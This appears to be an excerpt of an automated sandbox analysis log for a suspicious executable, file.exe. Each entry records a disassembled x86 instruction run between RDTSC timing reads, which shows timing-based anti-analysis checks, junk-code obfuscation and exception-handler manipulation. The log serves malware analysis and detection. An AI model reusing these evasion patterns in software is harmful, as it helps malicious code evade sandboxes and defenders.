Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9A68 second address: 7C9AF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4D44D05196h 0x00000009 jmp 00007F4D44D051A3h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 jmp 00007F4D44D0519Bh 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F4D44D05198h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F4D44D05198h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 and di, 17ADh 0x00000056 xchg eax, ebx 0x00000057 push ebx 0x00000058 jno 00007F4D44D0519Ch 0x0000005e pop ebx 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9AF8 second address: 7C9AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9AFC second address: 7C9B06 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB715 second address: 7CB71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB45B second address: 7CB466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F4D44D05196h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB71B second address: 7CB720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB466 second address: 7CB47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4D44D0519Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB720 second address: 7CB730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4D45034D1Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB47D second address: 7CB483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CB730 second address: 7CB79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F4D45034D18h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 jmp 00007F4D45034D21h 0x00000029 push 00000000h 0x0000002b mov esi, 39B7D3B1h 0x00000030 and di, 3F55h 0x00000035 xchg eax, ebx 0x00000036 jg 00007F4D45034D24h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jo 00007F4D45034D18h 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC1C9 second address: 7CC1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CC1CE second address: 7CC1EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4D45034D21h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CCC8F second address: 7CCC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE09A second address: 7CE0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CE13B second address: 7CE13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D581F second address: 7D5829 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4D45034D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5829 second address: 7D5874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F4D44D05198h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sbb ebx, 7EE41D3Ah 0x00000029 stc 0x0000002a push 00000000h 0x0000002c or dword ptr [ebp+122D3198h], edi 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12467B4Ch], ecx 0x0000003a push eax 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e jc 00007F4D44D05196h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D88CF second address: 7D88D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DA830 second address: 7DA867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4D44D0519Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jnp 00007F4D44D051ADh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D5A0B second address: 7D5A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D68F7 second address: 7D68FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D8A72 second address: 7D8B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, edx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov ebx, ecx 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F4D45034D18h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+12468BF9h] 0x0000003a mov di, si 0x0000003d mov eax, dword ptr [ebp+122D115Dh] 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007F4D45034D18h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d jmp 00007F4D45034D24h 0x00000062 push FFFFFFFFh 0x00000064 push ecx 0x00000065 mov dword ptr [ebp+122D2A3Bh], ebx 0x0000006b pop edi 0x0000006c mov dword ptr [ebp+122D1BF9h], eax 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 je 00007F4D45034D16h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9993 second address: 7D9A3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F4D44D051A3h 0x00000010 nop 0x00000011 jno 00007F4D44D0519Ch 0x00000017 add di, 6123h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F4D44D05198h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 jng 00007F4D44D0519Ch 0x0000004a mov edi, dword ptr [ebp+122D1E4Eh] 0x00000050 mov eax, dword ptr [ebp+122D14A1h] 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push eax 0x0000005b call 00007F4D44D05198h 0x00000060 pop eax 0x00000061 mov dword ptr [esp+04h], eax 0x00000065 add dword ptr [esp+04h], 00000016h 0x0000006d inc eax 0x0000006e push eax 0x0000006f ret 0x00000070 pop eax 0x00000071 ret 0x00000072 mov di, BF40h 0x00000076 mov di, ax 0x00000079 add bh, FFFFFFFFh 0x0000007c nop 0x0000007d push ebx 0x0000007e push edx 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB80B second address: 7DB80F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D8B0F second address: 7D8B19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9A3A second address: 7D9A4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F4D45034D18h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB80F second address: 7DB832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F4D44D051A5h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D8B19 second address: 7D8B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9A4B second address: 7D9A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB832 second address: 7DB846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4D45034D20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7D9A50 second address: 7D9A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DB846 second address: 7DB88C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and ebx, 455515C5h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F4D45034D18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov bx, E50Eh 0x0000002f push 00000000h 0x00000031 xor bx, 54F4h 0x00000036 xchg eax, esi 0x00000037 jnl 00007F4D45034D1Eh 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD8DE second address: 7DD8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F4D44D05196h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD8EE second address: 7DD8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DD8F8 second address: 7DD921 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D37C1h] 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D31A3h], eax 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1E1Dh], ebx 0x00000022 xchg eax, esi 0x00000023 push ebx 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E08FA second address: 7E0917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jg 00007F4D45034D1Ch 0x0000000f je 00007F4D45034D1Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0917 second address: 7E099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ecx 0x00000009 call 00007F4D44D05198h 0x0000000e pop ecx 0x0000000f mov dword ptr [esp+04h], ecx 0x00000013 add dword ptr [esp+04h], 0000001Dh 0x0000001b inc ecx 0x0000001c push ecx 0x0000001d ret 0x0000001e pop ecx 0x0000001f ret 0x00000020 sub dword ptr [ebp+122D2502h], esi 0x00000026 mov bx, D040h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F4D44D05198h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D3A21h] 0x0000004c push 00000000h 0x0000004e jmp 00007F4D44D051A6h 0x00000053 push edx 0x00000054 mov dword ptr [ebp+122D2572h], esi 0x0000005a pop ebx 0x0000005b push eax 0x0000005c jl 00007F4D44D051A0h 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DCA87 second address: 7DCB15 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4D45034D1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or dword ptr [ebp+122D1EB2h], edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F4D45034D18h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 push ecx 0x00000033 pop ebx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F4D45034D18h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 jng 00007F4D45034D18h 0x0000005b mov bh, 43h 0x0000005d mov eax, dword ptr [ebp+122D14C5h] 0x00000063 xor dword ptr [ebp+12466D61h], esi 0x00000069 push FFFFFFFFh 0x0000006b push esi 0x0000006c mov edi, dword ptr [ebp+122D23D0h] 0x00000072 pop ebx 0x00000073 push eax 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 push esi 0x00000078 pop esi 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DDB7C second address: 7DDB80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEA0A second address: 7DEA39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4D45034D18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jno 00007F4D45034D2Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E19B6 second address: 7E19BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEA39 second address: 7DEA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEA3D second address: 7DEACC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4D44D05196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+12453C7Ch], eax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 xor di, F800h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push eax 0x00000028 call 00007F4D44D05198h 0x0000002d pop eax 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 add dword ptr [esp+04h], 0000001Dh 0x0000003a inc eax 0x0000003b push eax 0x0000003c ret 0x0000003d pop eax 0x0000003e ret 0x0000003f mov eax, dword ptr [ebp+122D14D9h] 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F4D44D05198h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f jmp 00007F4D44D0519Dh 0x00000064 push FFFFFFFFh 0x00000066 jnp 00007F4D44D05196h 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f push ecx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7DEACC second address: 7DEAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E0ABA second address: 7E0ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3865 second address: 7E386B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3E27 second address: 7E3E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1B7D second address: 7E1C11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F4D45034D1Ch 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F4D45034D18h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 sub dword ptr [ebp+122D2A24h], edi 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov edi, esi 0x00000040 mov eax, dword ptr [ebp+122D00B9h] 0x00000046 mov edi, esi 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F4D45034D18h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000015h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 mov dword ptr [ebp+122D27B9h], edx 0x0000006a pushad 0x0000006b or dword ptr [ebp+124554CBh], edi 0x00000071 jmp 00007F4D45034D1Ch 0x00000076 popad 0x00000077 nop 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b push edi 0x0000007c pop edi 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C11 second address: 7E1C1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E1C1E second address: 7E1C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E3FAA second address: 7E3FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E408E second address: 7E4092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E4092 second address: 7E40AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779AA8 second address: 779AB2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4D45034D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7EB878 second address: 7EB87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4EDD second address: 7F4EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F4EE3 second address: 7F4EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5383 second address: 7F538D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4D45034D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F538D second address: 7F53AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F4D44D051A5h 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F53AF second address: 7F53BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4D45034D16h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5530 second address: 7F5534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5534 second address: 7F5549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4D45034D1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5549 second address: 7F5554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4D44D05196h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5554 second address: 7F5559 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5559 second address: 7F557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F4D44D051A9h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F557D second address: 7F5583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F588A second address: 7F5898 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F5898 second address: 7F589C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7F589C second address: 7F58A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7CF15B second address: 7CF161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
